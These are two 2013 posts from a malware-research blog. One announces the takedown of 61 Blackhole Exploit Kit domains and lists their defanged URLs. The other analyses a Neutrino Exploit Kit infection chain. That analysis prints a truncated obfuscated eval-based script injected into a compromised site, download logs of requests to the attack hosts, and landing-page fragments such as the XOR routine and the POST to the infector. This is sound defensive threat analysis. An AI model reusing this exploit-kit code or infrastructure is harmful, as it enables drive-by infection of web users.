Saturday, June 29, 2013

Suspension announcement of 61 unique domains used by Blackhole Exploit Kit ("closest" type) Crime Group operated on 80.78.247.114 (Russia)

MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

The current report is a fast and successful suspension process, as a good coordination between members who spotted, analyzed & reported the threat, to our PiCs in Tango Team (thank's to ‏@S with @CL for the hard work) and the related registrars who help us with the GREAT cooperation for the swift follows and banning further registration procedure process (blacklist) accordingly. We have a much better pace in suspending process (less than 18hrs), even right before weekend, as a good lead time reference for future cases.

Following is the report detail, with noted: is not aiming for the analysis details (we have a lot of similar case analysis in our blog already) but more to be a cybercrime-evidence purpose, with all of the materials posted are to be utilized for following legal process.

Verdict of Crime

We detected the very dangerous exploit kit landing page of malware infection via browser's vulnerability exploitation pointed to the below IP/NETWORK:

"80.78.247.114 / AS43146 Agava Ltd.(Russia  Federation)"
Initially caught in the act using Blackhole Exploit Kit the "/closest/" version operated under below URL:
"h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
 :"
Furthermore the activity also recorded in Virus total pDNS report:
URL: https://www.virustotal.com/en/ip-address/80.78.247.114/information/
"2013-06-28 18:30:12 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-28 18:26:43 h00p://detectedflights.org/closest/
2013-06-27 21:33:13 h00p://terminalspervasive.biz/
2013-06-27 19:52:24 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262
2013-06-27 19:08:09 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 16:37:32 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:38:34 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:33:21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 19:28:27 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 00:16:13 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
2013-06-25 22:15:47 h00p://platformvillains.in/closest/hospital-worker.php
2013-06-25 21:40:54 h00p://platformvillains.in/
2013-06-25 21:40:35 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php 
"
And also monitored in the URLQuery:
URL: http://urlquery.net/search.php?q=80.78.247.114&type=string&start=2013-05-01&end=2013-06-29&max=400
"2013-06-28 21:20:51 1 /  0 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 16:05:21 0 /  0 h00p://detectedflights.org/closest/ [Russian Federation] 80.78.247.114
2013-06-28 11:20:30 1 /  0 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 11:19:03 1 /  0 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 23:33:26 0 /  2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 23:15:52 1 /  0 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 21:49:41 0 /  2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 20:40:27 2 / 13 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:43:31 2 /  6 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:39:28 2 / 21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:26:24 2 / 15 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 18:49:18 2 / 14 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 15:10:13 2 / 11 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 15:01:50 2 /  9 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:53:14 2 / 14 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:11:13 2 / 49 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:05:27 2 / 54 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 13:08:19 2 / 26 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 10:35:34 2 /  7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 09:50:03 2 /  7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 07:08:47 2 / 47 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 01:58:39 2 / 26 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 22:00:39 0 /  0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 21:28:24 2 / 24 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 20:50:53 0 /  2 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-26 13:57:32 0 /  0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 13:56:00 0 /  0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:38:23 0 /  0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:00:06 2 / 50 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 03:08:24 2 / 24 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 00:21:59 2 / 10 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:52:36 2 / 14 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 23:44:57 2 / 23 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:28:58 2 / 25 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 22:00:33 2 /  7 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:29:13 2 /  9 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:27:52 1 /  0 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:14:20 2 / 11 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:02:07 1 /  0 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
"

Exploit Attack Evidence

Some snapshots of the exploit infector used:

is an evidence as per recorded in URLQuery records below:

"http://urlquery.net/report.php?id=3356618
http://urlquery.net/report.php?id=3356579
http://urlquery.net/report.php?id=3355901
http://urlquery.net/report.php?id=3352167
http://urlquery.net/report.php?id=3332078
  :"

Tango Information

Dismantling detail is, although was spotted 150+ domains under various conditions registered by the same bad actor behind this scheme, we sorted to the 61 unique domains listed below which will be enough to put the related infection out of internet. Sorting was proceed by eliminating the double records, usage of sub-domains, not clearly related/in-verdicted domains. These domains is confirmed down by June 28th, 2013, 23:59(pm) GMT+9. The registrant's used individual ID/credentials is marked and spread to all registrars as blacklist for the further threat's blocking, and also passed to the regional authority for the further legal process.

The suspended malware related domain list is as per below:

"anotherfactory.biz
artificialwind.asia
automatedpersonal.biz
balloonmansards.biz
blissfullyshare.biz
builtinscrupulous.net
campgroundstexts.biz
challengingprobably.biz
cokelendino.biz
conceptuallynetra.biz
coveringtelex.org
crypticallyhits.biz
delacruse.biz
directorybasedvibration.biz
discontiguousnds.asia
enterprisespumpkin.biz
eulaschalk.biz
examplefeatures.biz
expressionssentrybay.biz
extensivemymagicjackcom.org
fingertipsync.biz
flagsreimagining.biz
forgotperson.biz
fourthdvst.org
garbleddesigns.net
hoodselectable.biz
hourswebdav.biz
humorannouncement.biz
illustrateredeemed.net
joliclouddestructive.net
klockspell.biz
laptophandextremely.biz
lookyouthful.biz
massacrehighesttiered.biz
mediumsizedacdsees.biz
metadataconverse.net
muckinghighres.net
normov.biz
ntjobs.biz
nutsprerelease.biz
obamanizererouting.biz
perdevicecategoryyoursphere.net
pkielements.biz
prohibitedhill.biz
ridspayback.asia
scriptedbecome.biz
smugmugextras.biz
snapfishletnarrator.biz
sparesaddressmanually.biz
specialtyinterpreted.biz
squirrelspremade.biz
staffsenjoyment.biz
subsystemgandhi.biz
subtractionipvcertified.biz
summarysomeplace.biz
technologiesblipping.biz
votingkasperskyequipped.biz
vsmounting.org
webcastingtyping.biz
webworkzoneibm.biz
withinstyrofoam.biz"

Public announcement by #MalwareMustDie.NPO.,All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Monday, June 24, 2013

Knockin' on Neutrino Exploit Kit's door.. (where is "that" PluginDetect 0.8.0 ??)

Summary of infection chains

This is going to be a long writing, but the weekdays has been started.. so does the daily work and they go first in #MalwareMustDie, NPO rules, so please allow me to split this post into two parts, this is the important part..

Found this EK in the progress of infection; URI reference, landing page & malicious obfuscation code used are showing Neutrino Exploit Kit traces, but there are slight changes compares previous findings posted by fellow researchers in here and there, so maybe it's a different or newest variant.

By the time I spotted this, it was a fresh on-growing threat and started to build infection chains. I can't just sit and watch nor just play with it, so as a quick act to stop this (which is a must) I dare myself to make malicious verdict post for the shutdown reference purpose. Please help to push this threat's shutdown ASAP, don't wait for the research's pace (with thank's in advance).

First, let's get straight to summary of infection as per below written table.
PS: Believe me that all of the information below is worth to block the threat, and NO! this is never be a good/legit mechanism, must be a malicious scheme, so don't waste your time in wondering, grab the sample we grabbed as per attached and see it yourself (quicker).

EK Functions IP Address URL
Redirector 74.53.108.147 h00p://www.webapps4hotels.com/?wps=2
TDS/Clicker 81.88.48.79 h00p://bizkaikopirenaika.com/clicker.php
Landing Page 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
PluginDetect File 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js
Payload/Infector URL 178.17.169.199 h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371

Neutrino EK is up in 178.17.169.199 in Moldova, Europe and serves random multiple domains infector as per below (we are requesting the shutting down for these malicious act at this moment), which is partially based on shared DNS service:

1. xxx.dnsdojo.com

mlviwwiokblfqj.dnsdojo.com
mocqrrrnqxeuyejthn.dnsdojo.com
hdpbdwndymbtrsvxship.dnsdojo.net
youbljtwmqfpggrest.dnsdojo.net
pxwkcdewyrqu.dnsdojo.net
kmevvwtioxwu.dnsdojo.net
  :
2. xxx.selfip.biz
ilustyewwwiec.selfip.biz
pporvwwsrqfwqdiiqvj.selfip.biz
ifwutmgywlrno.selfip.biz
hxlswcwsyodq.selfip.biz
mqydnjycdjmpdqhs.selfip.biz
wqkcrphwlxv.selfip.biz
fwklleuqdogcmhxtirw.selfip.biz
  :
3. xxx.worse-than.tv
45400f3233e52d15694cf990.worse-than.tv
26745522c585519482f0e3e3.worse-than.tv
d22a34203ed4dc4571e361de.worse-than.tv
  :
4. xxx.does-it.net
brmvcfvtplecyqryixyv.does-it.net
plmomkgpxxej.does-it.net
  :

While the TDS service used is in IP: 81.88.48.79 in Italy, which also a shared dynamic DNS domains/service as per below:

onlinux-es.setupdns.net 
Which is involving huge possibility of domains as malware infector, list is -->>[HERE]

Addionally the redirector used shared domains spotted in IP: 74.53.108.147 on Houston, Texas, of ISP/domain: theplanet.com

acaville.com.pe
fridgeadvisor.com
thetreadmilladvisor.com
webapps4hotels.com
  :

Neutrino EK's Landing / Infection Analysis

It was started from the redirection url via spam leads to the redirector URL.
By the browser it looks like this:

The download log..

--2013-06-24 19:00:11--  h00p://www.webapps4hotels.com/?wps=2
Resolving www.webapps4hotels.com... seconds 0.00, 74.53.108.147
Caching www.webapps4hotels.com => 74.53.108.147
Connecting to www.webapps4hotels.com|74.53.108.147|:80... seconds 0.00, connected.
  :"
GET /?wps=2 HTTP/1.0
Host: www.webapps4hotels.com
HTTP request sent, awaiting response...
 ":
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2013 10:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: h00p://www.webapps4hotels.com/xmlrpc.php
Set-Cookie: PHPSESSID=79a8dc9b2b759b5e987a266ce9991b74; path=/
Set-Cookie: nosqueeze=nosqueeze; expires=Mon, 17-Jun-2013 10:00:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
  :
Length: unspecified [text/html]
Saving to: `index.html'
2013-06-24 19:00:13 (109 KB/s) - `index.html' saved [56700]
You'll see the malicious code right away as per snipped jinxed code:
<body class="home blog single-author two-column right-sidebar">

                                                               
    <script type="text/javascript" language="javascript" >
                                                                
                    bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;
ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12
v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval
"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,1
                  [...]
1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];
for(i=2-2;-i+1314!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]
))+0xa-bv);}za=e;za(s)}</script><div id="page" class="hfeed">
 <header id="branding" role="banner">
The code explains as per follows..

these variables are the key to rotate the values...

 sp="spli"+"t";
 w=window;
 ff=String.fromCharCode;
 z="dy";

..and then it writes the body...

 try
 {
   document["bo"+z]++
 }

..and after it runs , the eval burped...

   try
   {
     document;
   }
   catch(wb)
   {
     vzs=2;
   }
   if(!vzs)e=w["eval"];
      :

The burped eval value is the hidden IFRAMER with the specific cookie condition:

This is why I got the TDS URL, which I checked as follows:

// TDS trolls...

--2013-06-24 19:31:14--  "h00p://bizkaikopirenaika.com/clicker.php"
Resolving bizkaikopirenaika.com... seconds 0.00, 81.88.48.79
Caching bizkaikopirenaika.com => 81.88.48.79
Connecting to bizkaikopirenaika.com|81.88.48.79|:80... seconds 0.00, connected.
  :"
GET /clicker.php HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
Host: bizkaikopirenaika.com
HTTP request sent, awaiting response...
 ":"
HTTP/1.1 302 Found"
Date: Mon, 24 Jun 2013 10:31:07 GMT
Server: Apache/2.2.14 (Unix)
X-Powered-By: PHP/5.2.5
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Content-Length: 0
Content-Type: text/html
Content-Language: es
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
  :"
302 Found"
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371 [following]
Skipping 0 bytes of body: [] done.
--2013-06-24 19:31:18--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Resolving youbljtwmqfpggrest.dnsdojo.net... seconds 0.00, 178.17.169.199
Caching youbljtwmqfpggrest.dnsdojo.net => 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... seconds 0.00, connected.
  :
GET /afscm?qomseteng=7559371 HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: youbljtwmqfpggrest.dnsdojo.net:8000
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jun 2013 10:31:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.6
  :
200 OK
Length: unspecified [text/html]
Saving to: `afscm@qomseteng=7559371'
2013-06-24 19:31:22 (34.0 MB/s) - `afscm@qomseteng=7559371' saved [2512]
Well, we got the 302 that throwed us to the below url; "the" landing page.
h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
it will download us the below codes:

if we beautify the javascript part, which is the core of this infection and main verdict of the malicious act, you'll recognize it as the part of plugin detect codes to detect the plugin & etc components of your browsers, for the exploitation purpose:

For your reference, the full code of the landing page I beautified it here -->>[MMD PAstebin]
As you can see in the code, different from the previous Neutrino EK landing codes, it doesn't plainly mentioning the "host-id" or "password" used but now they hide it to be generated via below logic:
 JSON.stringify=JSON.stringify||function(a)
 {
   var c=typeof a;
   if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
   var d,b,e=[],f=a&&a.constructor==Array;
   for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")};

Back to the downloaded code (the Neutrino EK's landing page), it has so many links to .js and .css files, don't waste your time on these garbage, yes I checked them all, i.e. the .js files are below:

// below are the .js files..
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
...yup, to be sure I downloaded them all..
--2013-06-24 19:46:20--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/.js
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `wgyesrof.js'
2013-06-24 19:46:23 (923 KB/s) - `wgyesrof.js' saved [118]
Saving to: `vuofg.js'
2013-06-24 19:46:51 (6.50 MB/s) - `vuofg.js' saved [181]
Saving to: `cqqv.js'
2013-06-24 19:47:06 (5.96 MB/s) - `cqqv.js' saved [178]
Saving to: `cnvpce.js'
2013-06-24 19:47:23 (866 KB/s) - `cnvpce.js' saved [29]
Saving to: `aqrwwpb.js'
2013-06-24 19:47:41 (677 KB/s) - `aqrwwpb.js' saved [24]
Saving to: `hptkkoyqvzt.js'
2013-06-24 19:47:58 (4.85 MB/s) - `hptkkoyqvzt.js' saved [182]
Saving to: `ppkuryqha.js'
2013-06-24 19:49:07 (1.83 MB/s) - `ppkuryqha.js' saved [107]
Saving to: `blgxhwyvdop.js'
2013-06-24 19:49:27 (360 KB/s) - `blgxhwyvdop.js' saved [10]
Saving to: `zenpzmilbxv.js'
2013-06-24 19:49:47 (4.85 MB/s) - `zenpzmilbxv.js' saved [135]
Saving to: `oumvvhkwsruznt.js'
2013-06-24 19:50:12 (154 KB/s) - `oumvvhkwsruznt.js' saved [21]
Saving to: `rhkggotwoffagc.js'
2013-06-24 19:50:32 (1.18 MB/s) - `rhkggotwoffagc.js' saved [37]
Contain crap of strings...
// the list.. 
"
2013/06/24  19:47    24 aqrwwpb.js        e56eb6406a2ad302e8960c79c27c638b
2013/06/24  19:49    10 blgxhwyvdop.js    3172a382e2d9f1af0ff4242a60b85bc8
2013/06/24  19:47    29 cnvpce.js         d98c8323b16f548cf96efe38c5a18038
2013/06/24  19:47   178 cqqv.js           4a6813af85e9e4a06539b30a598d7054
2013/06/24  19:47   182 hptkkoyqvzt.js    60f725e731ca6431db8a309e35da2f1b
2013/06/24  19:50    21 oumvvhkwsruznt.js d1429317cea14fa84a9583474b1b0b03
2013/06/24  19:49   107 ppkuryqha.js      b801f8e1dc5f7fb40acceea6c70fff2c
2013/06/24  19:50    37 rhkggotwoffagc.js 022488c0ad7f8f038173ba55130b03c7
2013/06/24  19:46   181 vuofg.js          dfab72d0ed8c9b4cf56b7dccf2cb3484
2013/06/24  19:46   118 wgyesrof.js       0b6057183dcedf3d275d3dc6ee4131fa
2013/06/24  19:49   135 zenpzmilbxv.js    8a29661c15b5940a4744576b291d1078
"
// assemble the codes...to find you the garbage...
"
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
"
// cat & merge them all and result is here: 100% pure craps..

// wyczqnfpganiazbntkuycgxhytsxgyidwkcnyidfiqnjqpxkzsjcygjwacugacjxnmlmvordffmwukhucqxbxhyxjsejuohiasuvhmznsmjmwrhziea
// btkdpwixiezptqwfijjrukbbosnwrhosbywqveneintbdqhmzqeubfvpyjmprbiszeivjwarjutnkazjreetjzjhjvxawftwjcssyskindvxevhwzlpjlyqvtnwqspncrfvpygylkujoqqkpczzoypjsdgiwvvzmauczaakkutzkkjanja
// nzsdfulnbeahonomcixycuhxmwqtwxlkxendyzradsirfweifbhhwofilvchsnrqsftqekriczaiveqbfxicmolxjnecbwstbmkgwbozbohxsyyywhbivmffajhcgavhmgojicijrqhkofjknksixxnxhvznvvvibjrjmatdqaofgxq
// ggqkulbvalrssycymsyvfrkwjt
// xticyuzjlqnjbigpundax
// uapgllhhuyojyrzeaxhfbzwwtsgwwhoqhdxsoeajdosbgsggpomrniogbudxbrojumcjqdsurkwydcetrqlezzlaupywgngazjjqmckdmgcqjgjbxufxuryogxlnkrokayamalqmssdczmdxgjvabtpiqavbrjlshmehyvuroxunkxlqhgr
// voxtnlheexmejkkkjoffluwsvaaosrznfwhshpxmmjqvubgepljbggtbhuqzlpnrmukujihwsysmzzqplaqrgktoejoqzbilvsffamct
// hwouuqs
// igmeiwttqzebwsjihxodzsdoljcgbttjzgoichbthgueyemfcbjbunqgxsmylgilnwtpevjmberaiegkfqmzecgbvszgzhsmemcjilwkqnkyrrjwiwwmycntvnauuthzfkjo
// moqehjiffvtfkycywp
// oaqjntbakmsnnjuixihdcquslnvoidsxdi
it goes the same to the all .css files..
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/rcijxziqjmwai.css
ejuzjwuujkemwakngquwbriiviazztb
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/ubjabj.css
ylyvjo
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/wqhbu.css
vhrmzrnkvxkvpnnjsrhegmuvxuipgv
   : 
$ peekl h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/pqnojry.css
sxsstxnzjbjt

The PluginDetect 0.8.0

According plugin detection code above in the landing page, there MUST BE! the PluginDetect somewhere. Eager to know which version they use, I checked there is one more .JS worth to check, it is camouflaged under the /script/ directory. So let's fetch it:

--2013-06-24 20:02:06--  
"h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js"
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41616 (41K) [application/x-javascript]
Saving to: `plg.js'
2013-06-24 20:02:12 (42.4 KB/s) - `plg.js' saved [41616/41616]
Snipped is:
var PluginDetect={version:"0.8.0",name:"PluginDetect",openTag:...
RegExp(b):this.getNumRegx).exec(a):null;return c?c[0]:null},compar...
"0","0","0"]);for(c=0;4>c;c++)if(/^(0+)(.+)$/.test(d[c])&&(d[c]=Re...
this.$;return a.isIE&&7<=a.verIE?1:0},objectProperty:function(a){v...
!c.test(f))return d[e];return null},getMimeEnabledPlugin:function(...
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installe...
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;r...
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a....
c.getElementsByTagName("body")[0]||c.body||null;this.verIE=(this.i...
"")?5:b)||this.verIE;this.verIE=b||this.docModeIE}this.ActiveXEnab...
this.formatNum(RegExp.$1):null;this.verSafari=(this.isSafari=(/App...
this.isArray(a)&&0<a.length&&this.isFunc(a[0]))&&b.push(a)},callAr...
"0");1!=f.getVersionDone&&(f.getVersion(c,d,e),null===f.getVersion...
   :
The beautified code I pasted here--->>[MMD Pastebin]

Below is the list of detection & (malicious) weaponized possibility of this PluginDetect:

"Quicktime
Java
Flash
Shockwave
Windows Media Player
Silver Light
VideoLAN VLC
Adobe Reader
Real Player
"
Meaning, the exploitation of the above list of softwares are applicable.

The Neutrino EK's PluginDetect is not containing to a direct infection code, which all of the infection code is related to the applet in its landing pages so unlike the blackhole EK or cool EK, it will be no surprise to find Neutrino EK's PluginDetect script is undetectable by virus scanning products:

URL: https://www.virustotal.com/en/file/4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1/analysis/
SHA256: 4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1
SHA1:  6c15ef7801f35733e89e8df0113866d8a09a5ba6
MD5:  13f62e2903683ec97a25885b05e8bed9
File size:      40.6 KB ( 41616 bytes )
File name:      plg.js
File type:      Text
Tags:           text
Detection ratio: 0 / 47
Analysis date:  2013-06-24 16:19:36 UTC ( 10 hours, 39 minutes ago ) 

Malicious Exploit Kit Verdict

The supporting verdict to PoC this the landing page as EK’s landing(Neutrino):

1. Attempt to xor and decode the URL:

$.post(d,f,function(a)
{$("body").append(xor(decodeURIComponent(a),c))
2. Neutrino EK's infector string building logic (to be used by post query later on):
 for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")
3. The XOR logic itself..
function xor(a,c)
 { for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
   return d }
4. Below is the Java exploit infection traces via POST request recorded (still on-checks, the target is keeping on changing too..):
Query:   POST /bxfkxhcqk HTTP/1.1
host:    h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000
Referer: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371
This query above was generated by the below logic/code in the landing page:
[...]
   var f={};
   f[b]=c;
   f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
   $.post(d,f,function(a) {$("body").append(xor(decodeURIComponent(a),c))}
    [...]
5. The camouflage attempt to download PluginDetect 0.8.0
6. The attempt to hide XOR key in var aa, bb, cc
$(document).ready(function()
{ var aa = 'gvwuhd';
  var bb = '';
  var cc = aa;
  bb = cc;
to be stored in the var bb in function's parameter below:
\u0410\u041d602(
  '51c81ff4aaa2cce42c1809bd',
   bb,
   'bxfkxhcqk',  // <-- this string "params d" goes to the post.. MMD note. 
   'rruqytkegrvjt',
   'eefazbuhfeekpb'   );
For the further to be used in XOR related calls/function in the "c" parameter:
function \u0410\u041d602(a,c,d,b,e)

To be continued..
(plan: to more break-down the PluginDetect codes, payload details, further infection spreading details..if the EK is still exist later on..)


Additional

A couple of URLQuery result of this part of story---> [1] and [2]
And Virus Total infection check result (pDNS) for the Exploit Kit's IP is here-->>[Virus Total]

Samples and PCAP data is shared for raising the detection ratio and research purpose only:

Download here--->>[MMD Dumps]

Reference

Our friend "Malware Forensic" (link) wrote good analysis on previous version of Neutrino:
(click the number inside the bracket for links)
[-1-] Neutrino Exploit Kit landing page demystified
[-2-] Neutrino Exploit Kit Landing pane change or variation
[-3-] Neutrino Exploit Kit analysis

The great Exploit Kit researcher @kafeine (link) posted Neutrino EK:
[-1-] Hello Neutrino ! (just one more Exploit Kit)
[-2-] CVE-2013-2423 integrating Exploit Kits (Neutrino EK Parts)
[-3-] His tweet on changes spotted in this Exploit Kit:

Update Information

1. Since the shutdown was faster than grabbing overall EK data, I am sorry, no Part 2 for this post.
